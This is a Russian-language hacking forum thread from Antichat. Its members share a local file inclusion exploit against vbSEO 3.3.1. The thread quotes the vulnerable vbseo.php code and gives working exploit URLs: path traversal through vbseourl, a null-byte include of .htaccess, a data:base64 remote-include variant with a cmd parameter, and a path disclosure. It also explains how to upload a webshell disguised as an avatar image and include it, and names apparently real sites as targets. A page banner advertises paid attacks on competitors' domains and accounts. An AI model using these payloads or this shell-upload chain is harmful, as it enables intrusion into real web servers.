Форум АНТИЧАТ - vbSEO <= 3.3.1 LFI

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
vbSEO <= 3.3.1 LFI

Опции темы

Поиск в этой теме

Опции просмотра

vbSEO <= 3.3.1 LFI

10.11.2009, 18:08

BlackSun

Members of Antichat - Level 5

Регистрация: 01.04.2007

Сообщений: 1,268

Провел на форуме:
10046345

Репутация: 4589

vbSEO <= 3.3.1 LFI

Продукт: vbSEO <= 3.3.1 (возможно и более позние версии, если таковые имеются)
Офф сайт: vbseo.com
Опасность: 9\10

Уязвимый файл: vbseo.php
Уязвимый кусок кода:

Код:

16: if (isset($_GET['vbseourl'])) $vbseo_url_ = $_GET['vbseourl'];
....
55: define('VBSEO_BASEURL', basename($vbseo_url_));
....
819: if (!$vbseo_found) {
820: 	$vbseo_found_fn = VBSEO_BASEURL;
....
864: if ($_GET['vbseoembedd'] && $vbseo_found_fn) {
865: 	ob_start("vbseo_output_handler");
866:     require ($vbseo_found_fn);
867:     ob_flush();
868:     if (!defined('VBSEO_PROCESS')) {
869:         $output = ob_get_contents();
870:         ob_clean();
871:         $output = make_crawlable($output);
872:         echo $output;
873:     }
874:     exit();
875: }

Сплоент:
1. Если аватарки заливаются не в БД, то хост уязвим
2. vbseo.php?vbseoembedd=1&vbseourl=images//index.html
* юзаем двойные слеши
** из за гребанной функции basename на директорию ниже не спуститься, собственно и RFI обламывается из за этого же (
*** поправочка, конкретно не из за basename, там еще корявенькая фильтрация присутствует

Пример дырявого сайта я выкладывал - tgbr.in

Дорк оставлю при себе, один хрен на разных сайтах копирайты почему то разные или вообще отсутствуют.

Последний раз редактировалось BlackSun; 10.11.2009 в 18:58..

04.12.2009, 09:45

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

Провел на форуме:
11338585

Репутация: 441

Отправить сообщение для DimOnOID с помощью ICQ

Само собой инклуд удалённых должен быть включён.

PHP код:


		
			
vbseo.php?vbseoembedd=1&vbseourl=data:;base64,(тут что то не понятное)&cmd=пхпинфо;

Кто понял-тот понял)

Последний раз редактировалось DimOnOID; 04.12.2009 в 09:52..

11.12.2009, 10:47

login999

Постоянный

Регистрация: 12.06.2008

Сообщений: 654

Провел на форуме:
4512757

Репутация: 973

Эмм

Хз куда это написать, напишу сюда - там есть раскрытие путей, мб кому пригодится...

Код:

vbseo.php?vbseourl=cron.html

По крайней мере на паре сайтов (в том числе и на офф) этот файл отсутствует...

Последний раз редактировалось login999; 11.12.2009 в 10:50..

19.01.2010, 23:13

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

Провел на форуме:
2052341

Репутация: 95

Цитата:

http://myp2pforum.eu/vbseo.php?vbseourl=images/statusicon/post_old.gif%00.php

вот пример использования.

как заставить заинклудить ЛЮБУЮ гифку(т.е шелл)?

19.01.2010, 23:35

.Slip

Leaders of Antichat - Level 4

Регистрация: 16.01.2006

Сообщений: 1,966

Провел на форуме:
21768337

Репутация: 3486

Цитата:

Сообщение от jecka3000

вот пример использования.

как заставить заинклудить ЛЮБУЮ гифку(т.е шелл)?

Что значит ЛЮБУЮ? Гифка должна лежать не выше корня форума. Будут любые гифки там - инклудь.

__________________
..

19.01.2010, 23:45

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Цитата:

Сообщение от jecka3000

вот пример использования.

как заставить заинклудить ЛЮБУЮ гифку(т.е шелл)?

Вот:

Код:

http://myp2pforum.eu/vbseo.php?vbseoembedd=1&vbseourl=images/statusicon/post_old.gif

PS: А зачем там нулл-байт, да еще и .php в конце?

19.01.2010, 23:53

Root-access

Участник форума

Регистрация: 18.06.2008

Сообщений: 222

Провел на форуме:
2223440

Репутация: 648

Отправить сообщение для Root-access с помощью ICQ

Цитата:

Сообщение от mailbrush

Вот:

Код:

http://myp2pforum.eu/vbseo.php?vbseoembedd=1&vbseourl=images/statusicon/post_old.gif

PS: А зачем там нулл-байт, да еще и .php в конце?

Хм, а ведь это вариант использования уязвимости без параметра vbseoembedd. В новой версии правда всё равно не работает.

А нулл-байт и .php понятно зачем - vbseo.php думает, что это php файл и инклудит его, а там расширение обрезается и инклудится то, что до нулл-байта.

Но если аватары в бд, это ничего не даёт.
Пример (Isis, превед

Код:

http://forum.xeka.ru/vbseo.php?vbseourl=.htaccess%00.php

Последний раз редактировалось Root-access; 20.01.2010 в 00:39..

20.01.2010, 14:24

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

Провел на форуме:
2052341

Репутация: 95

.Slip, спасибо, но получается, чтобы получить шелл на сервере нужно каким-то другим образом залить в корень фтп гиф картинку или я чего не понимаю?

20.01.2010, 14:37

Grey

AMA - Level 2

Регистрация: 10.06.2006

Сообщений: 1,113

Провел на форуме:
17668503

Репутация: 5826

Цитата:

Сообщение от jecka3000

Какой еще корень фтп?
На некоторых булках заливка аватарки идет не в БД, а в диру и в таком случае не что не мешает залить вместо аватарки шелл с расширением картинки и затем проинклудить его.

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход